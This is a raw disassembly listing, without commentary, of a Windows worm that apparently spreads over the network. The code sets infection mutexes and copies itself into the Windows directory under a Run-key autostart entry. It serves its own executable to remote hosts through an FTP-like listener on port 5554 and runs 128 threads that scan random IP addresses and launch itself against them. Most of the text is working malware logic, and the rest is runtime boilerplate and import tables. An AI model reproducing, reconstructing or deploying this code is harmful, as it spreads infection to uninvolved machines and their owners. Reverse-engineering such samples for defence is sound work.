lea eax, [ebp+Str]
push offset aRetr ; "RETR"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz loc_401DDC
push 0
push off_4068E4 ; Str
call _strlen
pop ecx
push eax
push off_4068E4
push ebx
call esi
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_4050F4
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call dword_4050F8
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+Dst]
push 10h
push eax
push ebx
call dword_4050FC
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call dword_40511C
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset Source ; Source
push eax ; Dest
call _strcpy
mov ebx, dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; _lread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call dword_40511C
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+Str]
push offset aQuit ; "QUIT"
push eax ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call dword_40511C
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push off_4068DC ; Str
call _strlen
pop ecx
push eax
push off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call dword_40511C
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax ; C
call _isalnum
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: WinMain(x,x,x,x)+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_4050F8
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call dword_4050F4
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call dword_405118
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call dword_405100
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call dword_40511C
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call dword_4050E8
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call dword_405038 ; CreateThread
push 19h
call dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: WinMain(x,x,x,x)+8D�o
Source = byte ptr -454h
var_438 = byte ptr -438h
Dest = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call dword_40510C
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+Source]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+Source]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+Dest]
push 400h
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+Dest]
push offset asc_406A7C ; " "
push eax ; Dest
call _strcat
lea eax, [esp+46Ch+Source]
push eax ; Source
lea eax, [esp+470h+Dest]
push eax ; Dest
call _strcat
add esp, 10h
lea eax, [esp+464h+Dest]
push 0
push eax
call dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
Str = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+Str] ; Str
call _strlen
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+Str]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: WinMain(x,x,x,x)+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: WinMain(x,x,x,x)+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; CreateMutexA
call dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: WinMain(x,x,x,x)+66�j
mov edi, dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_4020B0: ; CODE XREF: WinMain(x,x,x,x)+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: WinMain(x,x,x,x)+AC�j
push esi
call dword_405000
push 0BB8h
call dword_405028 ; Sleep
jmp short loc_4020C3
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
Dest = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call dword_405034 ; GetModuleFileNameA
lea eax, [ebp+Dest]
push esi
push eax
call dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+Dest]
push offset asc_406ACC ; "\\"
push eax ; Dest
call _strcat
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push off_4068C8 ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _strcat
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+Dest]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call dword_405004
lea eax, [ebp+Dest]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push 1
push 0
push off_4068C8
push [ebp+var_4]
call dword_405008
push [ebp+var_4]
call dword_40500C
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; [00000058 BYTES: COLLAPSED FUNCTION _memset. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000080 BYTES: COLLAPSED FUNCTION _strstr. PRESS KEYPAD "+" TO EXPAND]
; [0000009C BYTES: COLLAPSED FUNCTION _strtok. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000007 BYTES: COLLAPSED FUNCTION _strcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000E0 BYTES: COLLAPSED FUNCTION _strcat. PRESS KEYPAD "+" TO EXPAND]
; [0000002E BYTES: COLLAPSED FUNCTION _isalnum. PRESS KEYPAD "+" TO EXPAND]
; [000000D7 BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call __XcptFilter
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call __exit
; [00000022 BYTES: COLLAPSED FUNCTION __amsg_exit. PRESS KEYPAD "+" TO EXPAND]
pop ecx
pop ecx
retn
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION _strchr. PRESS KEYPAD "+" TO EXPAND]
; [000000B6 BYTES: COLLAPSED FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
; [00000075 BYTES: COLLAPSED FUNCTION __isctype. PRESS KEYPAD "+" TO EXPAND]
; [0000002D BYTES: COLLAPSED FUNCTION __cinit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION _exit. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __exit. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION _doexit. PRESS KEYPAD "+" TO EXPAND]
; [0000001A BYTES: COLLAPSED FUNCTION __initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000141 BYTES: COLLAPSED FUNCTION __XcptFilter. PRESS KEYPAD "+" TO EXPAND]
; [00000043 BYTES: COLLAPSED FUNCTION _xcptlookup. PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION __wincmdln. PRESS KEYPAD "+" TO EXPAND]
; [000000B9 BYTES: COLLAPSED FUNCTION __setenvp. PRESS KEYPAD "+" TO EXPAND]
; [00000099 BYTES: COLLAPSED FUNCTION __setargv. PRESS KEYPAD "+" TO EXPAND]
; [000001B4 BYTES: COLLAPSED FUNCTION _parse_cmdline. PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO EXPAND]
; [000001AB BYTES: COLLAPSED FUNCTION __ioinit. PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION __heap_init. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_406D8C
jmp short loc_4034A0
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; [00000039 BYTES: COLLAPSED FUNCTION __FF_MSGBANNER. PRESS KEYPAD "+" TO EXPAND]
; [00000153 BYTES: COLLAPSED FUNCTION __NMSG_WRITE. PRESS KEYPAD "+" TO EXPAND]
; [00000149 BYTES: COLLAPSED FUNCTION ___crtGetStringTypeA. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __ismbblead. PRESS KEYPAD "+" TO EXPAND]
; [00000031 BYTES: COLLAPSED FUNCTION _x_ismbbtype. PRESS KEYPAD "+" TO EXPAND]
; [00000199 BYTES: COLLAPSED FUNCTION __setmbcp. PRESS KEYPAD "+" TO EXPAND]
; [0000004A BYTES: COLLAPSED FUNCTION _getSystemCP. PRESS KEYPAD "+" TO EXPAND]
; [00000033 BYTES: COLLAPSED FUNCTION _CPtoLCID. PRESS KEYPAD "+" TO EXPAND]
; [00000029 BYTES: COLLAPSED FUNCTION _setSBCS. PRESS KEYPAD "+" TO EXPAND]
; [00000185 BYTES: COLLAPSED FUNCTION _setSBUpLow. PRESS KEYPAD "+" TO EXPAND]
; [0000001C BYTES: COLLAPSED FUNCTION ___initmbctable. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
; [0000002C BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
; [0000003E BYTES: COLLAPSED FUNCTION ___sbh_heap_init. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+" TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
; [00000089 BYTES: COLLAPSED FUNCTION ___crtMessageBoxA. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000FE BYTES: COLLAPSED FUNCTION _strncpy. PRESS KEYPAD "+" TO EXPAND]
; [00000224 BYTES: COLLAPSED FUNCTION ___crtLCMapStringA. PRESS KEYPAD "+" TO EXPAND]
; [0000002B BYTES: COLLAPSED FUNCTION _strncnt. PRESS KEYPAD "+" TO EXPAND]
; [0000001B BYTES: COLLAPSED FUNCTION __callnewh. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000335 BYTES: COLLAPSED FUNCTION _memcpy_0. PRESS KEYPAD "+" TO EXPAND]
align 2
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404CA6 proc near ; CODE XREF: __global_unwind2+13�p
jmp dword_405080
sub_404CA6 endp
; ---------------------------------------------------------------------------
dd 0D5h dup(0)
dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 dd 0
dword_405014 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_405018 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_40127D+8F�r ...
dword_40501C dd 7C834E64h ; resolved to->KERNEL32._lclose ; sub_401B08+2AB�r
dword_405020 dd 7C838AE7h ; resolved to->KERNEL32._lwritedword_405024 dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_405028 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_40159E+4D0�r ...
dword_40502C dd 7C8353CEh ; resolved to->KERNEL32._lreaddword_405030 dd 7C85E830h ; resolved to->KERNEL32._lopendword_405034 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_401EF0+F8�r ...
dword_405038 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; WinMain(x,x,x,x):loc_402095�r
dword_40503C dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_405040 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_405044 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_405048 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_40504C dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_405050 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_405058 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeapdword_40505C dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; ___sbh_alloc_new_group+51�r
dword_405060 dd 7C9105D4h ; resolved to->NTDLL.RtlAllocateHeap ; ___sbh_heap_init+D�r ...
dword_405064 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_405068 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40506C dd 7C812E76h ; resolved to->KERNEL32.GetCPInfo ; _setSBUpLow+14�r
dword_405070 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; ___crtGetStringTypeA+12D�r
dword_405074 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeA ; ___crtGetStringTypeA+8D�r
dword_405078 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; ___crtGetStringTypeA+11B�r ...
dword_40507C dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_405080 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_405084 dd 7C91043Dh ; resolved to->NTDLL.RtlFreeHeap ; ___sbh_free_block+2C4�r ...
dword_405088 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_40508C dd 7C812BB6h ; resolved to->KERNEL32.HeapCreatedword_405090 dd 7C810EF8h ; resolved to->KERNEL32.HeapDestroydword_405094 dd 7C810E51h ; resolved to->KERNEL32.GetFileType ; __ioinit+166�r
dword_405098 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; ___crtLCMapStringA+14D�r ...
dword_40509C dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; ___crtLCMapStringA+A7�r
dword_4050A0 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_4050A4 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4050A8 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4050AC dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4050B0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; _doexit+91�r
dword_4050B4 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4050B8 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4050BC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050C0 dd 7C81DF77h ; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4050C4 dd 7C814AE7h ; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8 dd 7C80A0D4h ; resolved to->KERNEL32.WideCharToMultiByte ; ___crtLCMapStringA+20D�r
dword_4050CC dd 7C81CF5Bh ; resolved to->KERNEL32.GetEnvironmentStringsA ; ___crtGetEnvironmentStringsA+E1�r
dword_4050D0 dd 7C812F08h ; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050D4 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCountdword_4050D8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle ; __NMSG_WRITE+143�r
align 10h
dword_4050E0 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_40127D+B7�r ...
align 8
dword_4050E8 dd 0 dword_4050EC dd 0 ; sub_40159E+2DD�r ...
dword_4050F0 dd 0 ; sub_401398+151�r ...
dword_4050F4 dd 0 ; sub_40127D+27�r ...
dword_4050F8 dd 0 ; sub_40127D+51�r ...
dword_4050FC dd 0 ; sub_40127D+6C�r ...
dword_405100 dd 0 dword_405104 dd 0 dword_405108 dd 0 dword_40510C dd 0 ; sub_4011D5+7�r ...
dword_405110 dd 0 ; sub_4011D5+1E�r ...
dword_405114 dd 0 dword_405118 dd 0 dword_40511C dd 0 ; sub_40127D+10F�r ...
dd 2 dup(0)
dword_405128 dd 0FFFFFFFFh, 402915h, 402929h, 746E7572h, 20656D69h dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
dd 0Ah, 474E4953h, 72726520h, 0A0D726Fh, 0
dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
dd 65682065h, 0A0D7061h, 0
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 10h
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 10h
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 10h
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 10h
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra db 0Dh,0Ah
db 'abnormal program termination',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: .text:off_406DA4�o
db '- floating point not loaded',0Dh,0Ah,0
align 10h
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119�o
align 4
; char asc_4053E8[]
asc_4053E8 db 0Ah ; DATA XREF: __NMSG_WRITE+F1�o
db 0Ah,0
align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3�o
db 0Ah
db 'Program: ',0
align 4
; char a___[]
a___ db '...',0 ; DATA XREF: __NMSG_WRITE+BF�o
; char aProgramNameUnk[]
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7D�o
align 4
dword_405424 dd 0 ; ___crtLCMapStringA+36�o
dword_405428 dd 0FFFFFFFFh, 403815h, 403819haGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+3D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA+35�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+24�o
aUser32_dll db 'user32.dll',0 ; DATA XREF: ___crtMessageBoxA+D�o
align 10h
dword_405470 dd 0FFFFFFFFh, 40480Eh, 404812h, 0FFFFFFFFh, 4048C2h, 4048C6h
; DATA XREF: ___crtLCMapStringA+5�o
dd 55CCh, 2 dup(0)
dd 561Ch, 50E0h, 5500h, 2 dup(0)
dd 5714h, 5014h, 55D4h, 2 dup(0)
dd 5722h, 50E8h, 54ECh, 2 dup(0)
dd 5774h, 5000h, 5 dup(0)
dd 572Eh, 5766h, 5754h, 5746h, 0
dd 7C801D77h, 7C80BE01h, 7C834E64h, 7C838AE7h, 7C8365A5h
dd 7C802442h, 7C8353CEh, 7C85E830h, 7C80B4CFh, 7C810637h
dd 7C86136Dh, 7C910331h, 7C80929Ch, 7C80E93Fh, 7C8286EEh
dd 7C821363h, 7C80ADA0h, 7C9179FDh, 7C809A51h, 7C9105D4h
dd 7C8127A7h, 7C809915h, 7C812E76h, 7C80A490h, 7C838A0Ch
dd 7C809BF8h, 7C810D87h, 7C937A40h, 7C91043Dh, 7C809AE4h
dd 7C812BB6h, 7C810EF8h, 7C810E51h, 7C80CCA8h, 7C838DE8h
dd 7C80B6A1h, 7C801EEEh, 7C812F1Dh, 7C8111DAh, 7C81CDDAh
dd 7C801E16h, 7C80DDF5h, 7C862E2Ah, 7C81DF77h, 7C814AE7h
dd 7C80A0D4h, 7C81CF5Bh, 7C812F08h, 7C80CC97h, 7C812F39h
dd 0
dd 7E41A8ADh, 0
dd 80000001h, 80000010h, 80000013h, 80000009h, 80000017h
dd 80000004h, 8000000Dh, 80000039h, 8000000Ch, 8000000Bh
dd 80000034h, 80000073h, 80000002h, 80000003h, 0
dd 73770000h, 6E697270h, 416674h, 52455355h, 642E3233h
dd 6C6Ch, 65470000h, 6F725074h, 64644163h, 73736572h, 0
aLoadlibrarya db 'LoadLibraryA',0
align 4
aLstrcpya db 'lstrcpyA',0
align 4
a_lclose db '_lclose',0
